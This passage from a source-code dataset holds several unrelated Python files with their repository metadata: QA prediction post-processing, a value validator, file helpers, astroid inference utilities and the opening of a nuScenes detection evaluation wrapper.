# limitations under the License.
"""
Post-processing utilities for question answering.
"""
import collections
import json
import logging
import os
from typing import Optional, Tuple
import numpy as np
from tqdm.auto import tqdm
logger = logging.getLogger(__name__)
def postprocess_qa_predictions(
examples,
features,
predictions: Tuple[np.ndarray, np.ndarray],
version_2_with_negative: bool = False,
n_best_size: int = 20,
max_answer_length: int = 30,
null_score_diff_threshold: float = 0.0,
output_dir: Optional[str] = None,
prefix: Optional[str] = None,
):
"""
Post-processes the predictions of a question-answering model to convert them to answers that are substrings of the
    original contexts. This is the base postprocessing function for models that only return start and end logits.
Args:
examples: The non-preprocessed dataset (see the main script for more information).
features: The processed dataset (see the main script for more information).
predictions (:obj:`Tuple[np.ndarray, np.ndarray]`):
The predictions of the model: two arrays containing the start logits and the end logits respectively. Its
first dimension must match the number of elements of :obj:`features`.
version_2_with_negative (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the underlying dataset contains examples with no answers.
n_best_size (:obj:`int`, `optional`, defaults to 20):
The total number of n-best predictions to generate when looking for an answer.
max_answer_length (:obj:`int`, `optional`, defaults to 30):
The maximum length of an answer that can be generated. This is needed because the start and end predictions
are not conditioned on one another.
null_score_diff_threshold (:obj:`float`, `optional`, defaults to 0):
The threshold used to select the null answer: if the best answer has a score that is less than the score of
the null answer minus this threshold, the null answer is selected for this example (note that the score of
the null answer for an example giving several features is the minimum of the scores for the null answer on
each feature: all features must be aligned on the fact they `want` to predict a null answer).
Only useful when :obj:`version_2_with_negative` is :obj:`True`.
output_dir (:obj:`str`, `optional`):
If provided, the dictionaries of predictions, n_best predictions (with their scores and logits) and, if
:obj:`version_2_with_negative=True`, the dictionary of the scores differences between best and null
answers, are saved in `output_dir`.
prefix (:obj:`str`, `optional`):
If provided, the dictionaries mentioned above are saved with `prefix` added to their names.
is_world_process_zero (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether this process is the main process or not (used to determine if logging/saves should be done).
"""
assert len(predictions) == 2, "`predictions` should be a tuple with two elements (start_logits, end_logits)."
all_start_logits, all_end_logits = predictions
assert len(predictions[0]) == len(features), f"Got {len(predictions[0])} predictions and {len(features)} features."
# Build a map example to its corresponding features.
example_id_to_index = {k: i for i, k in enumerate(examples["id"])}
features_per_example = collections.defaultdict(list)
for i, feature in enumerate(features):
features_per_example[example_id_to_index[feature["example_id"]]].append(i)
# The dictionaries we have to fill.
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
if version_2_with_negative:
scores_diff_json = collections.OrderedDict()
# Logging.
logger.info(f"Post-processing {len(examples)} example predictions split into {len(features)} features.")
# Let's loop over all the examples!
for example_index, example in enumerate(tqdm(examples)):
# Those are the indices of the features associated to the current example.
feature_indices = features_per_example[example_index]
min_null_prediction = None
prelim_predictions = []
# Looping through all the features associated to the current example.
for feature_index in feature_indices:
# We grab the predictions of the model for this feature.
start_logits = all_start_logits[feature_index]
end_logits = all_end_logits[feature_index]
            # This is what will allow us to map some of the positions in our logits to spans of text in the original
# context.
offset_mapping = features[feature_index]["offset_mapping"]
# Optional `token_is_max_context`, if provided we will remove answers that do not have the maximum context
# available in the current feature.
token_is_max_context = features[feature_index].get("token_is_max_context", None)
# Update minimum null prediction.
feature_null_score = start_logits[0] + end_logits[0]
if min_null_prediction is None or min_null_prediction["score"] > feature_null_score:
min_null_prediction = {
"offsets": (0, 0),
"score": feature_null_score,
"start_logit": start_logits[0],
"end_logit": end_logits[0],
}
# Go through all possibilities for the `n_best_size` greater start and end logits.
start_indexes = np.argsort(start_logits)[-1 : -n_best_size - 1 : -1].tolist()
end_indexes = np.argsort(end_logits)[-1 : -n_best_size - 1 : -1].tolist()
for start_index in start_indexes:
for end_index in end_indexes:
# Don't consider out-of-scope answers, either because the indices are out of bounds or correspond
# to part of the input_ids that are not in the context.
if (
start_index >= len(offset_mapping)
or end_index >= len(offset_mapping)
or offset_mapping[start_index] is None
or offset_mapping[end_index] is None
):
continue
# Don't consider answers with a length that is either < 0 or > max_answer_length.
if end_index < start_index or end_index - start_index + 1 > max_answer_length:
continue
                    # Don't consider answers that don't have the maximum context available (if such information is
# provided).
if token_is_max_context is not None and not token_is_max_context.get(str(start_index), False):
continue
prelim_predictions.append(
{
"offsets": (offset_mapping[start_index][0], offset_mapping[end_index][1]),
"score": start_logits[start_index] + end_logits[end_index],
"start_logit": start_logits[start_index],
"end_logit": end_logits[end_index],
}
)
if version_2_with_negative:
# Add the minimum null prediction
prelim_predictions.append(min_null_prediction)
null_score = min_null_prediction["score"]
# Only keep the best `n_best_size` predictions.
predictions = sorted(prelim_predictions, key=lambda x: x["score"], reverse=True)[:n_best_size]
# Add back the minimum null prediction if it was removed because of its low score.
if version_2_with_negative and not any(p["offsets"] == (0, 0) for p in predictions):
predictions.append(min_null_prediction)
# Use the offsets to gather the answer text in the original context.
context = example["context"]
for pred in predictions:
offsets = pred.pop("offsets")
pred["text"] = context[offsets[0] : offsets[1]]
# In the very rare edge case we have not a single non-null prediction, we create a fake prediction to avoid
# failure.
if len(predictions) == 0 or (len(predictions) == 1 and predictions[0]["text"] == ""):
predictions.insert(0, {"text": "empty", "start_logit": 0.0, "end_logit": 0.0, "score": 0.0})
# Compute the softmax of all scores (we do it with numpy to stay independent from torch/tf in this file, using
# the LogSumExp trick).
scores = np.array([pred.pop("score") for pred in predictions])
exp_scores = np.exp(scores - np.max(scores))
probs = exp_scores / exp_scores.sum()
# Include the probabilities in our predictions.
for prob, pred in zip(probs, predictions):
pred["probability"] = prob
# Pick the best prediction. If the null answer is not possible, this is easy.
if not version_2_with_negative:
all_predictions[example["id"]] = predictions[0]["text"]
else:
# Otherwise we first need to find the best non-empty prediction.
i = 0
while predictions[i]["text"] == "":
i += 1
best_non_null_pred = predictions[i]
# Then we compare to the null prediction using the threshold.
score_diff = null_score - best_non_null_pred["start_logit"] - best_non_null_pred["end_logit"]
scores_diff_json[example["id"]] = float(score_diff) # To be JSON-serializable.
if score_diff > null_score_diff_threshold:
all_predictions[example["id"]] = ""
else:
all_predictions[example["id"]] = best_non_null_pred["text"]
# Make `predictions` JSON-serializable by casting np.float back to float.
all_nbest_json[example["id"]] = [
{k: (float(v) if isinstance(v, (np.float16, np.float32, np.float64)) else v) for k, v in pred.items()}
for pred in predictions
]
# If we have an output_dir, let's save all those dicts.
if output_dir is not None:
assert os.path.isdir(output_dir), f"{output_dir} is not a directory."
prediction_file = os.path.join(
output_dir, "predictions.json" if prefix is None else f"{prefix}_predictions.json"
)
nbest_file = os.path.join(
output_dir, "nbest_predictions.json" if prefix is None else f"{prefix}_nbest_predictions.json"
)
if version_2_with_negative:
null_odds_file = os.path.join(
output_dir, "null_odds.json" if prefix is None else f"{prefix}_null_odds.json"
)
logger.info(f"Saving predictions to {prediction_file}.")
with open(prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
logger.info(f"Saving nbest_preds to {nbest_file}.")
with open(nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if version_2_with_negative:
logger.info(f"Saving null_odds to {null_odds_file}.")
with open(null_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
return all_predictions
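# Example call (illustrative sketch only; `eval_examples`, `eval_features`, `start_logits`
# and `end_logits` are assumed to come from the main script's preprocessing and model
# outputs, and "outputs" is a hypothetical directory):
#
#   final_predictions = postprocess_qa_predictions(
#       examples=eval_examples,
#       features=eval_features,
#       predictions=(start_logits, end_logits),
#       version_2_with_negative=True,
#       n_best_size=20,
#       max_answer_length=30,
#       null_score_diff_threshold=0.0,
#       output_dir="outputs",
#   )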
def postprocess_qa_predictions_with_beam_search(
examples,
features,
predictions: Tuple[np.ndarray, np.ndarray],
version_2_with_negative: bool = False,
n_best_size: int = 20,
max_answer_length: int = 30,
start_n_top: int = 5,
end_n_top: int = 5,
output_dir: Optional[str] = None,
prefix: Optional[str] = None,
is_world_process_zero: bool = True,
):
"""
Post-processes the predictions of a question-answering model with beam search to convert them to answers that are substrings of the
    original contexts. This is the postprocessing function for models that return start and end logits, indices, as well as
cls token predictions.
Args:
examples: The non-preprocessed dataset (see the main script for more information).
features: The processed dataset (see the main script for more information).
predictions (:obj:`Tuple[np.ndarray, np.ndarray]`):
The predictions of the model: two arrays containing the start logits and the end logits respectively. Its
first dimension must match the number of elements of :obj:`features`.
version_2_with_negative (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the underlying dataset contains examples with no answers.
n_best_size (:obj:`int`, `optional`, defaults to 20):
The total number of n-best predictions to generate when looking for an answer.
max_answer_length (:obj:`int`, `optional`, defaults to 30):
The maximum length of an answer that can be generated. This is needed because the start and end predictions
are not conditioned on one another.
start_n_top (:obj:`int`, `optional`, defaults to 5):
            The number of top start logits to keep when searching for the :obj:`n_best_size` predictions.
end_n_top (:obj:`int`, `optional`, defaults to 5):
            The number of top end logits to keep when searching for the :obj:`n_best_size` predictions.
output_dir (:obj:`str`, `optional`):
If provided, the dictionaries of predictions, n_best predictions (with their scores and logits) and, if
:obj:`version_2_with_negative=True`, the dictionary of the scores differences between best and null
answers, are saved in `output_dir`.
prefix (:obj:`str`, `optional`):
If provided, the dictionaries mentioned above are saved with `prefix` added to their names.
is_world_process_zero (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether this process is the main process or not (used to determine if logging/saves should be done).
"""
assert len(predictions) == 5, "`predictions` should be a tuple with five elements."
start_top_log_probs, start_top_index, end_top_log_probs, end_top_index, cls_logits = predictions
assert len(predictions[0]) == len(
features
), f"Got {len(predictions[0])} predicitions and {len(features)} features."
# Build a map example to its corresponding features.
example_id_to_index = {k: i for i, k in enumerate(examples["id"])}
features_per_example = collections.defaultdict(list)
for i, feature in enumerate(features):
features_per_example[example_id_to_index[feature["example_id"]]].append(i)
# The dictionaries we have to fill.
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict() if version_2_with_negative else None
# Logging.
logger.setLevel(logging.INFO if is_world_process_zero else logging.WARN)
logger.info(f"Post-processing {len(examples)} example predictions split into {len(features)} features.")
# Let's loop over all the examples!
for example_index, example in enumerate(tqdm(examples)):
# Those are the indices of the features associated to the current example.
feature_indices = features_per_example[example_index]
min_null_score = None
prelim_predictions = []
# Looping through all the features associated to the current example.
for feature_index in feature_indices:
# We grab the predictions of the model for this feature.
start_log_prob = start_top_log_probs[feature_index]
start_indexes = start_top_index[feature_index]
end_log_prob = end_top_log_probs[feature_index]
end_indexes = end_top_index[feature_index]
feature_null_score = cls_logits[feature_index]
            # This is what will allow us to map some of the positions in our logits to spans of text in the original
# context.
offset_mapping = features[feature_index]["offset_mapping"]
# Optional `token_is_max_context`, if provided we will remove answers that do not have the maximum context
# available in the current feature.
token_is_max_context = features[feature_index].get("token_is_max_context", None)
# Update minimum null prediction
if min_null_score is None or feature_null_score < min_null_score:
min_null_score = feature_null_score
# Go through all possibilities for the `n_start_top`/`n_end_top` greater start and end logits.
for i in range(start_n_top):
for j in range(end_n_top):
start_index = int(start_indexes[i])
j_index = i * end_n_top + j
end_index = int(end_indexes[j_index])
# Don't consider out-of-scope answers (last part of the test should be unnecessary because of the
# p_mask but let's not take any risk)
if (
start_index >= len(offset_mapping)
or end_index >= len(offset_mapping)
or offset_mapping[start_index] is None
or offset_mapping[end_index] is None
):
continue
# Don't consider answers with a length negative or > max_answer_length.
if end_index < start_index or end_index - start_index + 1 > max_answer_length:
continue
                    # Don't consider answers that don't have the maximum context available (if such information is
# provided).
if token_is_max_context is not None and not token_is_max_context.get(str(start_index), False):
continue
prelim_predictions.append(
{
"offsets": (offset_mapping[start_index][0], offset_mapping[end_index][1]),
"score": start_log_prob[i] + end_log_prob[j_index],
"start_log_prob": start_log_prob[i],
"end_log_prob": end_log_prob[j_index],
}
)
# Only keep the best `n_best_size` predictions.
predictions = sorted(prelim_predictions, key=lambda x: x["score"], reverse=True)[:n_best_size]
# Use the offsets to gather the answer text in the original context.
context = example["context"]
for pred in predictions:
offsets = pred.pop("offsets")
pred["text"] = context[offsets[0] : offsets[1]]
# In the very rare edge case we have not a single non-null prediction, we create a fake prediction to avoid
# failure.
if len(predictions) == 0:
predictions.insert(0, {"text": "", "start_logit": -1e-6, "end_logit": -1e-6, "score": -2e-6})
# Compute the softmax of all scores (we do it with numpy to stay independent from torch/tf in this file, using
# the LogSumExp trick).
scores = np.array([pred.pop("score") for pred in predictions])
exp_scores = np.exp(scores - np.max(scores))
probs = exp_scores / exp_scores.sum()
# Include the probabilities in our predictions.
for prob, pred in zip(probs, predictions):
pred["probability"] = prob
# Pick the best prediction and set the probability for the null answer.
all_predictions[example["id"]] = predictions[0]["text"]
if version_2_with_negative:
scores_diff_json[example["id"]] = float(min_null_score)
# Make `predictions` JSON-serializable by casting np.float back to float.
all_nbest_json[example["id"]] = [
{k: (float(v) if isinstance(v, (np.float16, np.float32, np.float64)) else v) for k, v in pred.items()}
for pred in predictions
]
# If we have an output_dir, let's save all those dicts.
if output_dir is not None:
assert os.path.isdir(output_dir), f"{output_dir} is not a directory."
prediction_file = os.path.join(
output_dir, "predictions.json" if prefix is None else f"{prefix}_predictions.json"
)
nbest_file = os.path.join(
output_dir, "nbest_predictions.json" if prefix is None else f"{prefix}_nbest_predictions.json"
)
if version_2_with_negative:
null_odds_file = os.path.join(
output_dir, "null_odds.json" if prefix is None else f"{prefix}_null_odds.json"
)
print(f"Saving predictions to {prediction_file}.")
with open(prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
print(f"Saving nbest_preds to {nbest_file}.")
with open(nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if version_2_with_negative:
print(f"Saving null_odds to {null_odds_file}.")
with open(null_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
return all_predictions, scores_diff_json
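# Example call (illustrative sketch only; the five prediction arrays are assumed to come
# from a beam-search QA head, typically XLNet-style, matching the tuple unpacked at the top
# of this function):
#
#   final_predictions, null_odds = postprocess_qa_predictions_with_beam_search(
#       examples=eval_examples,
#       features=eval_features,
#       predictions=(start_top_log_probs, start_top_index,
#                    end_top_log_probs, end_top_index, cls_logits),
#       version_2_with_negative=True,
#       output_dir="outputs",
#   )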
| 52.016432
| 135
| 0.642087
|
517149aa62cbe4a2cd19156a0e76009f5846dc49
| 876
|
py
|
Python
|
validators/truthy.py
|
alimcmaster1/validators
|
29df0817d840263c371c32bd704706c6a8a36a85
|
[
"MIT"
] | 586
|
2015-01-17T08:54:54.000Z
|
2022-03-26T08:32:58.000Z
|
validators/truthy.py
|
alimcmaster1/validators
|
29df0817d840263c371c32bd704706c6a8a36a85
|
[
"MIT"
] | 157
|
2015-06-24T07:29:04.000Z
|
2022-03-19T07:29:03.000Z
|
validators/truthy.py
|
alimcmaster1/validators
|
29df0817d840263c371c32bd704706c6a8a36a85
|
[
"MIT"
] | 138
|
2015-06-22T14:27:35.000Z
|
2022-03-27T21:00:25.000Z
|
from .utils import validator
@validator
def truthy(value):
"""
    Validate that the given value is not a falsy value.
This validator is based on `WTForms DataRequired validator`_.
.. _WTForms DataRequired validator:
https://github.com/wtforms/wtforms/blob/master/wtforms/validators.py
Examples::
>>> truthy(1)
True
>>> truthy('someone')
True
>>> truthy(0)
ValidationFailure(func=truthy, args={'value': 0})
>>> truthy(' ')
ValidationFailure(func=truthy, args={'value': ' '})
>>> truthy(False)
ValidationFailure(func=truthy, args={'value': False})
>>> truthy(None)
ValidationFailure(func=truthy, args={'value': None})
.. versionadded:: 0.2
"""
return (
value and
(not isinstance(value, str) or value.strip())
)
| 21.9
| 75
| 0.579909
|
49afa85406380c1aa16db0af8922d7ac3dc91368
| 590
|
py
|
Python
|
src/utils/files.py
|
amanmalali/CompilerDock
|
0157c03c86ce9596ae7dfaaf298b794848e0c98b
|
[
"MIT"
] | 10
|
2020-06-28T14:25:17.000Z
|
2021-12-29T01:21:35.000Z
|
src/utils/files.py
|
amanmalali/CompilerDock
|
0157c03c86ce9596ae7dfaaf298b794848e0c98b
|
[
"MIT"
] | 3
|
2020-07-10T10:48:42.000Z
|
2020-07-26T14:08:15.000Z
|
src/utils/files.py
|
amanmalali/CompilerDock
|
0157c03c86ce9596ae7dfaaf298b794848e0c98b
|
[
"MIT"
] | 1
|
2020-06-28T14:31:15.000Z
|
2020-06-28T14:31:15.000Z
|
def init_dir(dest, filenames):
for name in filenames:
with open(f"{dest}/{name}", "w") as _:
pass
def create_files(data, filename, dest):
with open(f"{dest}/{filename}", "w") as file:
file.write(data)
def error_check(dest, filename):
with open(f"{dest}/{filename}", "r") as error_file:
errors = error_file.read()
if errors == "":
return (errors, False)
return (errors, True)
def read_ouput(dest, filename):
with open(f"{dest}/{filename}", "r") as file:
output = file.read()
return output
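# Example usage (illustrative sketch only; the directory and file names are hypothetical):
#
#   init_dir("/tmp/compile", ["main.c", "errors.log", "out.txt"])
#   create_files("int main(void) { return 0; }", "main.c", "/tmp/compile")
#   errors, failed = error_check("/tmp/compile", "errors.log")
#   output = read_ouput("/tmp/compile", "out.txt")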
| 24.583333
| 55
| 0.574576
|
c49ce66c207dcd98e024e62b8b455177fe920eca
| 10,857
|
py
|
Python
|
venv/Lib/site-packages/astroid/helpers.py
|
msactiondigital/mslearn-django-models-data
|
0833beaeac9aa1664193557a405e1e536ca411c2
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
venv/Lib/site-packages/astroid/helpers.py
|
msactiondigital/mslearn-django-models-data
|
0833beaeac9aa1664193557a405e1e536ca411c2
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
venv/Lib/site-packages/astroid/helpers.py
|
msactiondigital/mslearn-django-models-data
|
0833beaeac9aa1664193557a405e1e536ca411c2
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
# Copyright (c) 2015-2020 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2015-2016 Ceridwen <ceridwenv@gmail.com>
# Copyright (c) 2018 Bryce Guinta <bryce.paul.guinta@gmail.com>
# Copyright (c) 2020-2021 hippo91 <guillaume.peillex@gmail.com>
# Copyright (c) 2020 Simon Hewitt <si@sjhewitt.co.uk>
# Copyright (c) 2020 Bryce Guinta <bryce.guinta@protonmail.com>
# Copyright (c) 2020 Ram Rachum <ram@rachum.com>
# Copyright (c) 2021 Daniël van Noord <13665637+DanielNoord@users.noreply.github.com>
# Copyright (c) 2021 Pierre Sassoulas <pierre.sassoulas@gmail.com>
# Copyright (c) 2021 David Liu <david@cs.toronto.edu>
# Copyright (c) 2021 Marc Mueller <30130371+cdce8p@users.noreply.github.com>
# Copyright (c) 2021 Andrew Haigh <hello@nelf.in>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/main/LICENSE
"""
Various helper utilities.
"""
from astroid import bases, manager, nodes, raw_building, util
from astroid.context import CallContext, InferenceContext
from astroid.exceptions import (
AstroidTypeError,
AttributeInferenceError,
InferenceError,
MroError,
_NonDeducibleTypeHierarchy,
)
from astroid.nodes import scoped_nodes
def _build_proxy_class(cls_name, builtins):
proxy = raw_building.build_class(cls_name)
proxy.parent = builtins
return proxy
def _function_type(function, builtins):
if isinstance(function, scoped_nodes.Lambda):
if function.root().name == "builtins":
cls_name = "builtin_function_or_method"
else:
cls_name = "function"
elif isinstance(function, bases.BoundMethod):
cls_name = "method"
elif isinstance(function, bases.UnboundMethod):
cls_name = "function"
return _build_proxy_class(cls_name, builtins)
def _object_type(node, context=None):
astroid_manager = manager.AstroidManager()
builtins = astroid_manager.builtins_module
context = context or InferenceContext()
for inferred in node.infer(context=context):
if isinstance(inferred, scoped_nodes.ClassDef):
if inferred.newstyle:
metaclass = inferred.metaclass(context=context)
if metaclass:
yield metaclass
continue
yield builtins.getattr("type")[0]
elif isinstance(inferred, (scoped_nodes.Lambda, bases.UnboundMethod)):
yield _function_type(inferred, builtins)
elif isinstance(inferred, scoped_nodes.Module):
yield _build_proxy_class("module", builtins)
else:
yield inferred._proxied
def object_type(node, context=None):
"""Obtain the type of the given node
This is used to implement the ``type`` builtin, which means that it's
used for inferring type calls, as well as used in a couple of other places
in the inference.
The node will be inferred first, so this function can support all
sorts of objects, as long as they support inference.
"""
try:
types = set(_object_type(node, context))
except InferenceError:
return util.Uninferable
if len(types) > 1 or not types:
return util.Uninferable
return list(types)[0]
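# Illustrative sketch (assumes the public helper `astroid.extract_node` is available):
#
#   import astroid
#   node = astroid.extract_node("x = 1\nx")
#   object_type(node)  # expected to yield the ClassDef for builtins.int, or Uninferable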
def _object_type_is_subclass(obj_type, class_or_seq, context=None):
if not isinstance(class_or_seq, (tuple, list)):
class_seq = (class_or_seq,)
else:
class_seq = class_or_seq
if obj_type is util.Uninferable:
return util.Uninferable
# Instances are not types
class_seq = [
item if not isinstance(item, bases.Instance) else util.Uninferable
for item in class_seq
]
# strict compatibility with issubclass
# issubclass(type, (object, 1)) evaluates to true
# issubclass(object, (1, type)) raises TypeError
for klass in class_seq:
if klass is util.Uninferable:
raise AstroidTypeError("arg 2 must be a type or tuple of types")
for obj_subclass in obj_type.mro():
if obj_subclass == klass:
return True
return False
def object_isinstance(node, class_or_seq, context=None):
"""Check if a node 'isinstance' any node in class_or_seq
:param node: A given node
:param class_or_seq: Union[nodes.NodeNG, Sequence[nodes.NodeNG]]
:rtype: bool
:raises AstroidTypeError: if the given ``classes_or_seq`` are not types
"""
obj_type = object_type(node, context)
if obj_type is util.Uninferable:
return util.Uninferable
return _object_type_is_subclass(obj_type, class_or_seq, context=context)
def object_issubclass(node, class_or_seq, context=None):
"""Check if a type is a subclass of any node in class_or_seq
:param node: A given node
:param class_or_seq: Union[Nodes.NodeNG, Sequence[nodes.NodeNG]]
:rtype: bool
:raises AstroidTypeError: if the given ``classes_or_seq`` are not types
:raises AstroidError: if the type of the given node cannot be inferred
or its type's mro doesn't work
"""
if not isinstance(node, nodes.ClassDef):
raise TypeError(f"{node} needs to be a ClassDef node")
return _object_type_is_subclass(node, class_or_seq, context=context)
def safe_infer(node, context=None):
"""Return the inferred value for the given node.
Return None if inference failed or if there is some ambiguity (more than
one node has been inferred).
"""
try:
inferit = node.infer(context=context)
value = next(inferit)
except (InferenceError, StopIteration):
return None
try:
next(inferit)
return None # None if there is ambiguity on the inferred node
except InferenceError:
return None # there is some kind of ambiguity
except StopIteration:
return value
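# Illustrative sketch: on a node with a single unambiguous value, e.g.
# safe_infer(astroid.extract_node("1 + 2")), this is expected to return a Const node
# (value 3), while an ambiguous or uninferable node returns None.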
def has_known_bases(klass, context=None):
"""Return true if all base classes of a class could be inferred."""
try:
return klass._all_bases_known
except AttributeError:
pass
for base in klass.bases:
result = safe_infer(base, context=context)
# TODO: check for A->B->A->B pattern in class structure too?
if (
not isinstance(result, scoped_nodes.ClassDef)
or result is klass
or not has_known_bases(result, context=context)
):
klass._all_bases_known = False
return False
klass._all_bases_known = True
return True
def _type_check(type1, type2):
if not all(map(has_known_bases, (type1, type2))):
raise _NonDeducibleTypeHierarchy
if not all([type1.newstyle, type2.newstyle]):
return False
try:
return type1 in type2.mro()[:-1]
except MroError as e:
# The MRO is invalid.
raise _NonDeducibleTypeHierarchy from e
def is_subtype(type1, type2):
"""Check if *type1* is a subtype of *type2*."""
return _type_check(type1=type2, type2=type1)
def is_supertype(type1, type2):
"""Check if *type2* is a supertype of *type1*."""
return _type_check(type1, type2)
def class_instance_as_index(node):
"""Get the value as an index for the given instance.
If an instance provides an __index__ method, then it can
be used in some scenarios where an integer is expected,
for instance when multiplying or subscripting a list.
"""
context = InferenceContext()
try:
for inferred in node.igetattr("__index__", context=context):
if not isinstance(inferred, bases.BoundMethod):
continue
context.boundnode = node
context.callcontext = CallContext(args=[], callee=inferred)
for result in inferred.infer_call_result(node, context=context):
if isinstance(result, nodes.Const) and isinstance(result.value, int):
return result
except InferenceError:
pass
return None
def object_len(node, context=None):
"""Infer length of given node object
:param Union[nodes.ClassDef, nodes.Instance] node:
:param node: Node to infer length of
:raises AstroidTypeError: If an invalid node is returned
from __len__ method or no __len__ method exists
:raises InferenceError: If the given node cannot be inferred
or if multiple nodes are inferred or if the code executed in python
        would result in an infinite recursive check for length
:rtype int: Integer length of node
"""
# pylint: disable=import-outside-toplevel; circular import
from astroid.objects import FrozenSet
inferred_node = safe_infer(node, context=context)
# prevent self referential length calls from causing a recursion error
# see https://github.com/PyCQA/astroid/issues/777
node_frame = node.frame()
if (
isinstance(node_frame, scoped_nodes.FunctionDef)
and node_frame.name == "__len__"
and hasattr(inferred_node, "_proxied")
and inferred_node._proxied == node_frame.parent
):
message = (
"Self referential __len__ function will "
"cause a RecursionError on line {} of {}".format(
node.lineno, node.root().file
)
)
raise InferenceError(message)
if inferred_node is None or inferred_node is util.Uninferable:
raise InferenceError(node=node)
if isinstance(inferred_node, nodes.Const) and isinstance(
inferred_node.value, (bytes, str)
):
return len(inferred_node.value)
if isinstance(inferred_node, (nodes.List, nodes.Set, nodes.Tuple, FrozenSet)):
return len(inferred_node.elts)
if isinstance(inferred_node, nodes.Dict):
return len(inferred_node.items)
node_type = object_type(inferred_node, context=context)
if not node_type:
raise InferenceError(node=node)
try:
len_call = next(node_type.igetattr("__len__", context=context))
except StopIteration as e:
raise AstroidTypeError(str(e)) from e
except AttributeInferenceError as e:
raise AstroidTypeError(
f"object of type '{node_type.pytype()}' has no len()"
) from e
inferred = len_call.infer_call_result(node, context)
if inferred is util.Uninferable:
raise InferenceError(node=node, context=context)
result_of_len = next(inferred, None)
if (
isinstance(result_of_len, nodes.Const)
and result_of_len.pytype() == "builtins.int"
):
return result_of_len.value
if (
result_of_len is None
or isinstance(result_of_len, bases.Instance)
and result_of_len.is_subtype_of("builtins.int")
):
# Fake a result as we don't know the arguments of the instance call.
return 0
raise AstroidTypeError(
f"'{result_of_len}' object cannot be interpreted as an integer"
)
| 34.357595
| 85
| 0.677719
|
d27f642f0169d4592e8623dd7ed3ce2c2f83ff2f
| 9,739
|
py
|
Python
|
python-sdk/nuscenes/eval/detection/evaluate_wrapper.py
|
recogni/nuscenes-devkit
|
023dbc213b13b7026fc7723a93ceab717752678d
|
[
"Apache-2.0"
] | null | null | null |
python-sdk/nuscenes/eval/detection/evaluate_wrapper.py
|
recogni/nuscenes-devkit
|
023dbc213b13b7026fc7723a93ceab717752678d
|
[
"Apache-2.0"
] | 1
|
2021-12-20T15:03:04.000Z
|
2021-12-21T08:53:49.000Z
|
python-sdk/nuscenes/eval/detection/evaluate_wrapper.py
|
recogni/nuscenes-devkit
|
023dbc213b13b7026fc7723a93ceab717752678d
|
[
"Apache-2.0"
] | null | null | null |
# nuScenes dev-kit eval wrapper copied from python-sdk/nuscenes/eval/detection/evaluate.py.
# Original code written by Holger Caesar & Oscar Beijbom, 2018. Edited for internal usage.
from typing import List
from pyquaternion import Quaternion
from typing import Tuple, Dict, Any
from glob import glob
import numpy as np
from copy import deepcopy
import os
from nuscenes.eval.common.data_classes import EvalBoxes
from nuscenes.eval.detection.algo import calc_ap, calc_tp, match_boxes, stats_from_matches
from nuscenes.eval.common.utils import center_distance
from nuscenes.eval.detection.constants import TP_METRICS, DETECTION_NAMES
from nuscenes.eval.detection.data_classes import DetectionConfig, DetectionMetrics, DetectionBox, \
DetectionMetricDataList
class DetectionEvalWrapper:
"""
This is the un-official nuScenes detection evaluation code.
nuScenes uses the following detection metrics:
- Mean Average Precision (mAP): Uses center-distance as matching criterion; averaged over distance thresholds.
- True Positive (TP) metrics: Average of translation, scale, orientation.
- nuScenes Detection Score (NDS): The weighted sum of the above.
We assume that:
    - Every sample_token is given in the results, although there may be no predictions for that sample.
Please see https://www.nuscenes.org/object-detection for more details.
"""
AP_ERRORS = 'mean_dist_aps'
TP_ERRORS = 'label_tp_errors'
TRANSLATION_ERROR = "trans_err"
SCALE_ERROR = "scale_err"
ORIENTATION_ERROR = "orient_err"
def __init__(self,
gt_boxes: EvalBoxes,
pred_boxes: EvalBoxes,
verbose: bool = False):
"""
Init method.
:param gt_boxes: Ground Truth boxes.
:param pred_boxes: Predicted boxes.
:param verbose: Specify as true to print intermediate logs to stdout.
"""
self.verbose = verbose
# todo|note class ranges are not used. The range can be specified in the __call__ args.
self.cfg = DetectionConfig(class_range={
"car": 100,
"truck": 100,
"bus": 100,
"trailer": 100,
"construction_vehicle": 100,
"pedestrian": 100,
"motorcycle": 100,
"bicycle": 100,
"traffic_cone": 100,
"barrier": 100
},
dist_fcn="center_distance",
min_recall=0.1,
min_precision=0.1,
max_boxes_per_sample=500,
dist_ths=[0.0], # todo|note not used
dist_th_tp=0.0, # todo|note not used
mean_ap_weight=0, # todo|note not used
)
# Load data.
if verbose:
print('Initializing nuScenes detection evaluation')
self.pred_boxes = pred_boxes
self.gt_boxes = gt_boxes
assert set(self.pred_boxes.sample_tokens) == set(self.gt_boxes.sample_tokens), \
"Samples in split doesn't match samples in predictions."
def _evaluate(self, min_z: float, max_z: float, rel_dist_ths: List[float], rel_tp_dist_th: float) -> Tuple[DetectionMetrics, DetectionMetricDataList]:
"""
Performs the actual evaluation.
:param min_z: Min allowed Z. Filters boxes whose Z value is less than this.
:param max_z: Max allowed Z. Filter boxes whose Z value is more than this.
:param rel_dist_ths: Relative distance thresholds needed for matching GT to predictions, and then APs are averaged.
:param rel_tp_dist_th: Relative distance Threshold for the true positive metric.
:return: A tuple of high-level and the raw metric data.
"""
rel_dist_ths_ = deepcopy(rel_dist_ths)
if rel_tp_dist_th not in rel_dist_ths:
rel_dist_ths_.append(rel_tp_dist_th)
# -----------------------------------
# Step 0: Filter boxes for the specified range.
# -----------------------------------
